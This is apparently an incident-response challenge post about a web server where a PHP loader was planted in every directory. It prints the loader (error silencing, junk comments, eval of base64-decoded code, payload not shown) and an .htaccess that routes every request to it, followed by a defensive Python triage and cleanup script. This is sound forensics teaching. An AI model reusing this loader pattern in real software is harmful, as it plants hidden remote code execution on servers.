Uncovering a Silent Web Server Compromise
This challenge is presented largely as a replica of a cybersecurity incident I was asked to investigate and resolve earlier this year (2024). The background and initial report below are largely identical to what was presented to me when I was given a call to see if I could take a new client and help them out with this situation. The evidence files are REAL.
Background
A client has reported that all of their websites hosted on a shared server are displaying white/blank pages instead of the expected content. The client is unable to access their websites' functionality.
Initial Client Report
The client noticed all websites on their shared hosting environment suddenly started returning blank pages.
No specific error messages are displayed, even when visiting the websites directly.
The client can still access the server via FTP and reports they have not done any updates to any files recently aside from adding new blog posts like they do regularly (through their WordPress admin site, which can no longer be accessed either).
They also report their host recently shut them down due to excess bandwidth utilisation. They paid extra to bring it back to a running state, but the web pages are still blank.
The client has no idea how to find log files or send them to you. Regardless, when log files do get found, there is no evidence of anything unusual in them.
Notes:
Although some readers may not be familiar with web servers and PHP code, this should not deter you. You’re a cybersecurity analyst who’s been given an incident which is a potential breach of some sort. Your job is to investigate to the best of your abilities!
The server directories & Evidence Files:
The following two files were updated in EVERY directory on the client's web server. Not just public facing directories but EVERY directory. Same date & time stamp (within seconds). The files were identical to what is shown below, however in some cases, pre-existing index.php files were prepended with the index.php code below.
Note: On a web server, files named 'index' are generally the first thing served from a directory. For example, if I access erniejohnson.ca the web server looks for an 'index' file - it might be index.html (generally the first choice), index.htm, index.php, etc.
Evidence Files (safe to download and investigate).
DO NOT RUN the index.php unless you're in a sandboxed environment.
You do NOT need to run it to complete the investigation.
.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
index.php
<?php /*-fN.m}<Xl+-*/error_reporting(0); /*-&@0D!z>P.v-*/eval/*-6I@QKrX$i,nT2:Gji~Q4MxqKUbYYx4-*/(/*-y>5+K)2-*/base64_decode/*-[aSeAV-*/(/*-`#.{Yi#)m-*/"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"/*-a{G_2oeQdV-*/)/*-MM<SzuG9]-*/);?>
(as a note, the index.php file shown above is considered one continuous line when opening into a text/code editor like Sublime text or VSCode).
What is this index.php doing?
Can you simulate some examples?
How is this .htaccess file involved?
What are your discovered IoC’s?
What tools did you use?
What type of attack is this?
Is there more you can ascertain about the attacker? Is there a C2 server?
Given the limited information available, how do we deal with the ‘mess’ this has created?
The biggest hint I can first give is that inside of code - be it PHP, Python, C++, etc., "comments" can exist in the code. These comments are ignored by the code interpreter or compiler, rendering them pointless other than to human readers of that code. I'm hoping that gets you moving along if you're completely stuck looking at this. Unnecessary comments are often used to obscure legitimate code.
In PHP, code comments start with /* and end with */
In PHP, eval() executes whatever PHP code is passed to it as a string
Ok, now I'm practically giving it away ;)
What do you think is happening here?
base64_decode
There is another type of obfuscation / encryption occurring in the PHP file. It's a pretty simple form of encryption.
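Putting the hints above together, an analyst can triage a file like this without ever running it. The following Python script is an added example written for this page, not part of the original challenge or its solution: it strips the junk /* ... */ comments, statically decodes any eval(base64_decode("...")) layers for manual review, flags index.php files carrying the stub, and cuts a prepended stub off an original index.php. The sample input is constructed to mirror the challenge file, but its base64 payload is a harmless placeholder, not the real blob.

```python
import base64
import re
from pathlib import Path

# Constructed stand-in for the challenge's index.php: same junk /*...*/ comment
# structure, but the base64 payload is a harmless placeholder, NOT the real blob.
PLACEHOLDER_B64 = base64.b64encode(b'echo "placeholder";').decode()
SAMPLE_STUB = ('<?php /*-fN.m}<Xl+-*/error_reporting(0); /*-&@0D!z>P.v-*/eval/*-6I@QKr-*/'
               '(/*-y>5+K)2-*/base64_decode/*-[aSeAV-*/(/*-`#.{Yi#)m-*/"'
               + PLACEHOLDER_B64 + '"/*-a{G_2oeQdV-*/)/*-MM<SzuG9]-*/);?>')
# Constructed pre-existing index.php with the stub prepended, as seen in some directories.
SAMPLE_PREPENDED = SAMPLE_STUB + "\n<?php\n// original site code\necho 'hello';\n"

BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.DOTALL)
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)',
                      re.IGNORECASE)

def strip_block_comments(php: str) -> str:
    """Drop /* ... */ comments; the interpreter ignores them, so behaviour is unchanged."""
    return BLOCK_COMMENT.sub('', php)

def peel_eval_base64(php: str, max_layers: int = 8):
    """Statically unwrap nested eval(base64_decode("...")) layers without executing
    anything. Returns (layers removed, innermost text); any other encoding scheme
    found in that text is left for the analyst to handle by hand."""
    layers, current = 0, php
    while layers < max_layers:
        match = EVAL_B64.search(strip_block_comments(current))
        if not match:
            break
        current = base64.b64decode(match.group(1)).decode('utf-8', errors='replace')
        layers += 1
    return layers, current

def is_stub_infected(php: str) -> bool:
    """Triage signal: error silencing plus eval(base64_decode(...)) once comments are gone."""
    cleaned = strip_block_comments(php)
    return 'error_reporting(0)' in cleaned and EVAL_B64.search(cleaned) is not None

def strip_prepended_stub(php: str) -> str:
    """Recover the original file when the stub was prepended: cut at the stub's first ?>."""
    if not is_stub_infected(php):
        return php
    end = php.find('?>')
    return php[end + 2:].lstrip('\r\n') if end != -1 else ''

def sweep(root: str) -> list:
    """List every index.php under root carrying the stub (then compare mtimes with stat())."""
    return [str(p) for p in Path(root).rglob('index.php')
            if is_stub_infected(p.read_text(errors='replace'))]

if __name__ == '__main__':
    n, inner = peel_eval_base64(SAMPLE_STUB)
    print(f'{n} layer(s) peeled, innermost text for review:\n{inner}')
```

Run sweep() against a copy of the FTP download, never the live server, and review the innermost text by eye rather than feeding it back into PHP.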
You need more?
Well, sorry, you're out of luck for now, I haven't written any more hints yet!
solution coming soon